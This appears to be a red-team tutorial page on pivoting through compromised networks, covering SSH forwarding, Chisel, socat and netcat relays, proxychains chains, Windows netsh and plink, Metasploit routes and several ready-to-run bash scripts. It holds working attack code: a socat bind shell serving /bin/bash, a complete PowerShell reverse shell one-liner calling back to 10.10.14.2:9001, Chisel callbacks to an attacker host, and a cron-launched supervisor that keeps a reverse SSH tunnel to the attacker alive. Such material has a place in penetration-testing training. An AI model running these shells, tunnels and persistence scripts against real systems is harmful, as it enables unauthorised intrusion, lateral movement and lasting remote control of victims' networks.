Tunneling And Pivoting

Tunneling & Pivoting Masterclass — The Art of Moving Through Networks


When you’ve compromised a host inside a restricted environment, the external network is no longer your only battlefield — now you must pivot, tunnel, and chain access to reach internal assets. This section covers everything from simple SSH port forwarding to multi-layered SOCKS tunnels using tools like Chisel, SSH, and ProxyChains.


I. 🧩 Core Concepts

Concept           Description
Pivoting          Using one compromised host as a bridge to reach other internal targets.
Tunneling         Encapsulating traffic inside another protocol (typically SSH or HTTP/WebSocket) so it can cross a boundary it could not cross on its own.
Proxying          Routing traffic from one point through another (SOCKS, HTTP).
Port Forwarding   Redirecting traffic arriving on one port/interface to another address and port.
Reverse vs. Bind  Reverse = victim connects out to you; Bind = you connect in to the victim. Reverse usually survives inbound filtering; bind needs a reachable listener.


II. 🧠 Network Reconnaissance for Pivoting

Before tunneling, map the internal environment from the compromised host: which interfaces and subnets it sits on, what it can route to, which DNS servers it uses, and which services listen only on loopback (those are reachable solely through a forward).

🔍 Internal Recon Commands

ip a                    # interfaces and addresses: which subnets the pivot touches
netstat -tuln           # listening TCP/UDP sockets (ss -tuln on newer hosts)
route -n                # routing table: which networks are reachable and via which gateway
cat /etc/resolv.conf    # internal DNS servers and search domains

Scan internal subnets (ping sweep with a one-second timeout per host):

for i in {1..254}; do
  ping -c1 -W1 10.10.0.$i | grep "bytes from";
done

Enumerate services bound only to loopback (invisible from the network, reachable via a local forward):

ss -tuln | grep 127.0.0.1
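The commands above assume nmap, or at least ping, is available on the pivot. As an added example (not part of the original page), the following bash script does the same recon from the pivot with nothing but ping, ip and bash's built-in /dev/tcp redirection, which gives you a TCP connect probe on hosts where no scanner is installed. The /24 sweep, the port list and the sample ip -o -4 addr line in the comments are assumptions; run it on the pivot with --run.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): recon from the pivot itself when
# nmap is not installed there, using only ping, `ip` and bash's /dev/tcp.
# The subnet, port list and the sample `ip -o -4 addr` output are assumptions.

# Reduce an interface address in CIDR form (10.10.0.15/24) to a /24 prefix
# (10.10.0) for the sweep. Only /24-style sweeps are handled here.
subnet_prefix() {
  local cidr=$1
  echo "${cidr%/*}" | cut -d. -f1-3
}

# Pull non-loopback IPv4 addresses out of `ip -o -4 addr show` output read from
# stdin, e.g. "2: eth0    inet 10.10.0.15/24 brd 10.10.0.255 scope global eth0".
local_addrs() {
  awk '$3 == "inet" && $4 !~ /^127\./ { print $4 }'
}

# Parallel ping sweep of one /24; prints live addresses, one per line.
sweep_subnet() {
  local prefix=$1 i
  for i in $(seq 1 254); do
    ( ping -c1 -W1 "$prefix.$i" >/dev/null 2>&1 && echo "$prefix.$i" ) &
  done
  wait
}

# TCP connect probe without nmap: exit 0 if host:port accepts a connection,
# non-zero if refused, filtered (hits the timeout) or /dev/tcp is unavailable.
probe_port() {
  local host=$1 port=$2 secs=${3:-2}
  HOST=$host PORT=$port timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$HOST/$PORT"' 2>/dev/null
}

# Sweep every directly attached subnet, then check a short list of high-value
# ports on each live host.
main() {
  local ports="22 80 443 445 3389" addr prefix host port
  for addr in $(ip -o -4 addr show | local_addrs); do
    prefix=$(subnet_prefix "$addr")
    echo "[*] Sweeping $prefix.0/24 (from $addr)"
    for host in $(sweep_subnet "$prefix"); do
      for port in $ports; do
        probe_port "$host" "$port" && echo "[+] $host:$port open"
      done
    done
  done
}

# Only start scanning when explicitly asked: ./recon.sh --run
if [ "${1:-}" = "--run" ]; then main; fi
```

probe_port is the piece worth keeping: with the port list adjusted it stands in for nmap -sT on a pivot, and because it reports via exit status it composes with other scripts.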

III. ⚙️ SSH-Based Tunneling

🧩 1. Local Port Forwarding

Forward a service the pivot can reach → a port on your own machine

ssh -L 8080:127.0.0.1:80 user@pivot-host

Now visit http://127.0.0.1:8080 locally to access the remote web server. The destination (127.0.0.1:80) is interpreted on the pivot, so it may just as well be the address of a second internal host that only the pivot can reach.


🧩 2. Remote Port Forwarding

Run from the pivot: expose a service local to the pivot on the attacker host

ssh -R 9001:127.0.0.1:80 user@attacker

The attacker host can now reach the pivot's port 80 through its own 127.0.0.1:9001. sshd binds remote forwards to loopback unless GatewayPorts yes is set in its sshd_config; on your own attacker box loopback-only is usually what you want.


🧩 3. Dynamic Port Forwarding (SOCKS Proxy)

ssh -D 1080 user@pivot-host

Configure proxychains.conf (under [ProxyList]):

socks5 127.0.0.1 1080

Then:

proxychains nmap -sT -Pn 10.10.0.0/24

A SOCKS proxy carries TCP connections only: use a full-connect scan (-sT) and skip host discovery (-Pn), since SYN scans, ICMP pings and UDP probes never enter the tunnel and would silently report every host as down. Enable proxy_dns in proxychains.conf when targets must be resolved by the internal DNS.

IV. ⚒️ Chisel — Lightweight Pivoting Weapon

Chisel is a single static binary (Linux and Windows builds) that carries TCP forwards and a SOCKS5 proxy over an HTTP/WebSocket connection, so it works where no SSH server is available or where only web traffic is allowed out. The server runs on the attacker, the client on the victim.

🧠 1. Setup Listener (Attacker)

chisel server -p 8000 --reverse

--reverse lets clients request R: (remote) forwards, i.e. listeners that open on the server side.

💣 2. Connect from Victim

chisel client attacker_ip:8000 R:1080:socks

You now have a SOCKS5 proxy on the attacker's 127.0.0.1:1080 whose exit point is the victim; point proxychains at it to pivot deeper.

🧩 3. Port Forward Example

chisel client attacker_ip:8000 R:8080:127.0.0.1:80

The attacker's port 8080 now maps to port 80 on the victim's loopback. The target address is interpreted on the client side, so 10.10.0.5:80 would reach another internal host the victim can see.

V. 🔁 Socat & Netcat Pivoting

🧰 Port Redirection with Socat

Run on the pivot: every connection to the pivot's port 8080 is relayed to 10.10.0.5:80 (fork serves multiple clients, reuseaddr lets you restart it immediately)

socat TCP-LISTEN:8080,fork,reuseaddr TCP:10.10.0.5:80

🔄 Bind Shell on Port 80

This is a bind shell, not an HTTP tunnel: it only borrows port 80 so the inbound connection slips past port-based filtering. Connect to it with netcat from the attacker; add pty,stderr to the EXEC address for an interactive shell that also returns stderr.

socat TCP-LISTEN:80,fork EXEC:/bin/bash

🧠 Netcat Relay

A named pipe glues two netcat processes together so a connection to the pivot's port 9001 is relayed to 10.10.0.5:22. It serves one client at a time; remove /tmp/f when finished.

mkfifo /tmp/f; nc -lvp 9001 < /tmp/f | nc 10.10.0.5 22 > /tmp/f

VI. 🧰 ProxyChains + Chaining Tunnels

🔹 ProxyChains Config Example

[ProxyList]
socks5 127.0.0.1 1080
socks5 127.0.0.1 1081

In strict_chain mode (the shipped default) proxychains dials the first entry directly and asks each hop to connect to the next one, so every address after the first is interpreted by the previous hop: 127.0.0.1 1081 here means port 1081 on the first pivot's loopback, which must be running its own SOCKS listener toward the next network (for example an ssh -D 1081 from pivot1 to pivot2). If you instead nest tunnels on the attacker box (proxychains ssh -D 1081 user@pivot2), list only the innermost port. Every hop in the list must be a live SOCKS server or the whole chain fails.

Use chained proxies:

proxychains nmap -sT -Pn 172.16.0.0/24
proxychains firefox http://172.16.0.10
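As an added example (not code from the original page or from the proxychains project), the script below builds a per-engagement proxychains config rather than editing /etc/proxychains.conf, and validates the chain the way strict_chain will use it: it speaks SOCKS5 to the first hop, asks that hop to CONNECT to the second, and greets the second over the same socket. It assumes the proxychains-ng build (proxychains4, which accepts -f <file>); the hop addresses, ports and the 172.16.0.0/24 target are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): build a per-engagement
# proxychains config instead of editing /etc/proxychains.conf, and validate the
# chain the way proxychains will use it, by speaking SOCKS5 hop by hop.
# Assumes the proxychains-ng build (proxychains4, which takes -f <file>);
# the hop addresses, ports and target range are assumptions.

# Emit a complete config. Args: one "host:port" per SOCKS5 hop, first hop
# first. strict_chain = traverse every hop in order; proxy_dns = resolve
# names at the far end rather than leaking lookups from the attacker box.
make_proxychains_conf() {
  cat <<'EOF'
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
EOF
  local hop
  for hop in "$@"; do
    printf 'socks5 %s %s\n' "${hop%:*}" "${hop#*:}"
  done
}

# Encode an IPv4 address and port as printf escapes for a SOCKS5 ATYP=1
# address block (4 address bytes, 2 port bytes, network byte order).
socks5_addr_bytes() {
  local ip=$1 port=$2 o out=""
  for o in $(echo "$ip" | tr . ' '); do
    out="$out$(printf '\\x%02x' "$o")"
  done
  printf '%s\\x%02x\\x%02x\n' "$out" $((port >> 8)) $((port & 255))
}

# Client greeting on fd 3: VER=5, NMETHODS=1, METHOD=0x00 (no auth). A real
# SOCKS5 listener (ssh -D, chisel socks) answers 05 00. Bytes are compared as
# hex via od because shell variables cannot hold NUL.
socks5_greet() {
  printf '\x05\x01\x00' >&3
  [ "$(timeout 3 head -c 2 <&3 | od -An -tx1 | tr -d ' \n')" = "0500" ]
}

# CONNECT request on fd 3 to ip:port. Reply is VER REP RSV ATYP ADDR(4) PORT(2);
# REP=0x00 means the hop opened the onward connection.
socks5_connect() {
  printf "\x05\x01\x00\x01$(socks5_addr_bytes "$1" "$2")" >&3
  [ "$(timeout 3 head -c 10 <&3 | od -An -tx1 | tr -d ' \n' | cut -c1-4)" = "0500" ]
}

# Walk the chain exactly as strict_chain does: greet hop 1 directly, then ask
# each hop to CONNECT to the next one and greet that hop over the same socket.
# Addresses after the first are therefore as seen by the previous hop.
socks5_chain_probe() {
  (
    first=$1; shift
    exec 3<>"/dev/tcp/${first%:*}/${first#*:}" || exit 1
    socks5_greet || exit 2
    for hop in "$@"; do
      socks5_connect "${hop%:*}" "${hop#*:}" || exit 3
      socks5_greet || exit 2
    done
  ) 2>/dev/null
}

# Validate the chain, write the config and scan through it.
run_chain_scan() {
  local conf=${PROXYCHAINS_CONF:-/tmp/pc-engagement.conf}
  socks5_chain_probe "$@" || { echo "[-] chain broken (probe exit $?)" >&2; return 1; }
  make_proxychains_conf "$@" > "$conf"
  proxychains4 -f "$conf" nmap -sT -Pn -p 22,80,445,3389 172.16.0.0/24
}

# Example: attacker's ssh -D on 1080 (exit pivot1) and pivot1's own SOCKS on its
# loopback 1081 (exit pivot2):  ./chain.sh --run 127.0.0.1:1080 127.0.0.1:1081
if [ "${1:-}" = "--run" ]; then shift; run_chain_scan "$@"; fi
```

The probe exits 1 if the first hop is unreachable, 2 if a hop does not speak SOCKS5, and 3 if a hop cannot reach the next one, which is usually the "127.0.0.1 means the previous pivot's loopback" mistake described above.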

VII. 🔐 SSH Pivot through Multiple Hosts

🧩 Example: Two Internal Hops

ssh -J user@pivot1 user@pivot2

-J (ProxyJump) tunnels the session to pivot2 through pivot1; authentication to pivot2 still happens end to end from your machine, so no key has to be copied onto pivot1.

or with dynamic forwarding:

ssh -D 1080 -J user@pivot1 user@pivot2

The SOCKS listener opens on your machine as before, but its exit point is now pivot2, so proxychains sees pivot2's networks.

VIII. 💀 Windows-Side Tunneling

🧩 1. Plink (PuTTY's command-line SSH client)

plink.exe -ssh user@attacker_ip -L 8080:127.0.0.1:80 -N

Run on the Windows host against an SSH server you control; -L, -R and -D behave as in OpenSSH and -N keeps the session forward-only with no shell. From a victim that cannot accept inbound connections, use -R to push its services (RDP, SMB) out to your box instead. Current Windows builds also ship OpenSSH's ssh.exe, which takes the same flags.

💣 2. Using Netsh

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8080 connectaddress=10.10.0.5 connectport=80

Needs an elevated prompt and the IP Helper service (iphlpsvc). The rule is stored in the registry and survives reboots: list it with netsh interface portproxy show all and remove it with the matching delete v4tov4 command when done, as it is an obvious artifact for defenders.

⚙️ 3. PowerShell Reverse Shell

This one-liner is a reverse shell (an interactive command channel back to 10.10.14.2:9001), not a tunnel; start a listener there first (nc -lvnp 9001) and combine it with netsh or plink above when you need to forward traffic.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',9001);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"

IX. 🧩 Pivot Automation Example

🔹 Local Enumeration + SOCKS Pivot Script

#!/bin/bash
# Usage: ./pivot-scan.sh <host or CIDR>   (assumes a SOCKS entry already in proxychains.conf)
set -euo pipefail
target=${1:?usage: $0 <host or CIDR>}
echo "[*] Scanning internal via pivot..."
# -sT: full TCP connect, the only scan type SOCKS can carry; -Pn: skip ICMP discovery
proxychains nmap -sT -Pn -p 22,80,445,3389 "$target"

X. 🧠 Advanced Multi-Layer Pivoting

Layer   Tool                     Description
1       ssh -D                   First SOCKS tunnel; exit point on the pivot host
2       chisel R:1080:socks      Second tunnel from a deeper host, chained behind the first
3       ProxyChains              Route the scanner through both hops
4       Metasploit route add     Send Metasploit modules through an existing session

Example (session 1 is a Meterpreter session on the pivot; syntax: route add <subnet> <netmask> <session id>):

msf> route add 10.10.0.0 255.255.255.0 1
msf> use auxiliary/scanner/portscan/tcp

Modules aimed at 10.10.0.0/24 now ride through session 1. Only Metasploit's own traffic uses this route; for external tools start a SOCKS server inside msf (auxiliary/server/socks_proxy) and point proxychains at it.

XI. ⚔️ Real-World Workflow Example

# 1. Establish foothold (verify the credentials work, then exit)
ssh user@pivot1

# 2. Start SOCKS proxy on your box with exit point pivot1 (keep this session open)
ssh -D 1080 user@pivot1

# 3. Configure ProxyChains ([ProxyList] is the last section, so appending works; do it once)
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf

# 4. Scan internal network (TCP connect, no ping)
proxychains nmap -sT -Pn 10.10.0.0/24

# 5. Deploy Chisel for a deeper pivot: server on the attacker (10.10.14.2), client on a host
#    found in step 4. Use a new port: 1080 is already taken by the ssh -D listener.
#    If that host cannot reach 10.10.14.2 directly, publish port 8000 through pivot1 first
#    (e.g. an ssh -R forward on pivot1) and point the client at that instead.
chisel server -p 8000 --reverse              # attacker
chisel client 10.10.14.2:8000 R:1081:socks   # internal host; SOCKS now on attacker 127.0.0.1:1081

XII. 🧠 Pro Tips & Red Team Tricks

Speed vs. Stealth

  • Go slow through proxychains: each probe is a full TCP connect carried over the tunnel, so aggressive timing (-T4 and up) mostly yields timeouts and false negatives, and a burst of connections from the pivot is exactly what internal sensors flag. Scan small port lists first and widen later.

  • Compress tunnels with ssh -C for bandwidth-limited pivots.

Combine Layers

  • SOCKS + SSH + Chisel for multi-hop chains.

  • Use proxychains to send Burp Suite, SQLMap, or even Firefox traffic through your tunnels (Burp and Firefox can also be pointed at the SOCKS port directly in their proxy settings).

Persistence in Tunnels

  • Launch Chisel or SSH tunnels from cron jobs or Windows scheduled tasks so they re-establish after a drop; give ssh -o ServerAliveInterval=30 and -o ExitOnForwardFailure=yes so a dead or conflicting tunnel exits instead of hanging silently.

Operational Awareness

  • Always map internal subnets before pivoting again.

  • Keep a pivot diagram for tracking chain depth and SOCKS ports (which listener exits where), and tear forwards and portproxy rules down when the engagement ends.
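The persistence tip above, as an added example that is not part of the original page: a pivot-side supervisor that re-creates a reverse SSH tunnel to the attacker with exponential backoff, together with the ssh options that make a dead tunnel exit so the supervisor can notice. The attacker address 10.10.14.2 is the page's; the tunnel user, key path and forwarded ports are assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): supervise a reverse SSH tunnel
# from the pivot so it comes back after a drop, backing off exponentially so a
# dead attacker listener does not turn into a connection storm in the logs.
# Attacker user, key path and the forwarded ports below are assumptions.

# Pure helper: next delay = min(2 * delay, cap).
next_backoff() {
  local delay=$1 cap=$2
  if [ $((delay * 2)) -gt "$cap" ]; then echo "$cap"; else echo $((delay * 2)); fi
}

# Run "$@" until it exits 0 or RETRY_MAX attempts are used up. The delay starts
# at RETRY_BASE seconds and doubles up to RETRY_CAP. Returns the last exit code.
retry_with_backoff() {
  local max=${RETRY_MAX:-5} base=${RETRY_BASE:-2} cap=${RETRY_CAP:-60}
  local delay=$base attempt=1 rc
  while :; do
    "$@" && return 0
    rc=$?
    [ "$attempt" -ge "$max" ] && return "$rc"
    sleep "$delay"
    attempt=$((attempt + 1))
    delay=$(next_backoff "$delay" "$cap")
  done
}

# The tunnel itself. Every option exists to make a broken tunnel *exit* rather
# than hang, which is what lets the supervisor above do its job:
#   -N                         forwarding only, no remote shell
#   BatchMode=yes              never prompt (cron has no tty)
#   ExitOnForwardFailure=yes   fail if the remote port is already bound
#   ServerAliveInterval/CountMax  notice a dead peer within about 90 s
reverse_tunnel() {
  ssh -N -q \
      -o BatchMode=yes \
      -o ExitOnForwardFailure=yes \
      -o ServerAliveInterval=30 \
      -o ServerAliveCountMax=3 \
      -o StrictHostKeyChecking=accept-new \
      -i /opt/.cache/id_tunnel \
      -R 2222:127.0.0.1:22 \
      tunnel@10.10.14.2
}

# Supervise forever: a clean exit and a failure both mean "reconnect".
supervise() {
  while :; do
    RETRY_MAX=1000000 retry_with_backoff reverse_tunnel
    sleep 2
  done
}

if [ "${1:-}" = "--run" ]; then supervise; fi
```

Install it with a crontab line such as @reboot /path/to/tunnel.sh --run (path assumed), and on the attacker side restrict the key in authorized_keys with restrict,port-forwarding so a recovered key yields nothing beyond the forward.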


XIII. 🧩 Quick Reference Table

Goal                  Tool / Command
Local Port Forward    ssh -L 8080:127.0.0.1:80 user@pivot
Remote Port Forward   ssh -R 8080:127.0.0.1:80 user@attacker
SOCKS Proxy           ssh -D 1080 user@pivot
Multi-Hop SSH         ssh -J user@pivot1 user@pivot2
Chisel Reverse        chisel client attacker:8000 R:1080:socks
ProxyChains Scan      proxychains nmap -sT -Pn 10.10.0.0/24
Socat Relay           socat TCP-LISTEN:8080,fork TCP:10.10.0.5:80
Windows Port Proxy    netsh interface portproxy add v4tov4 ...

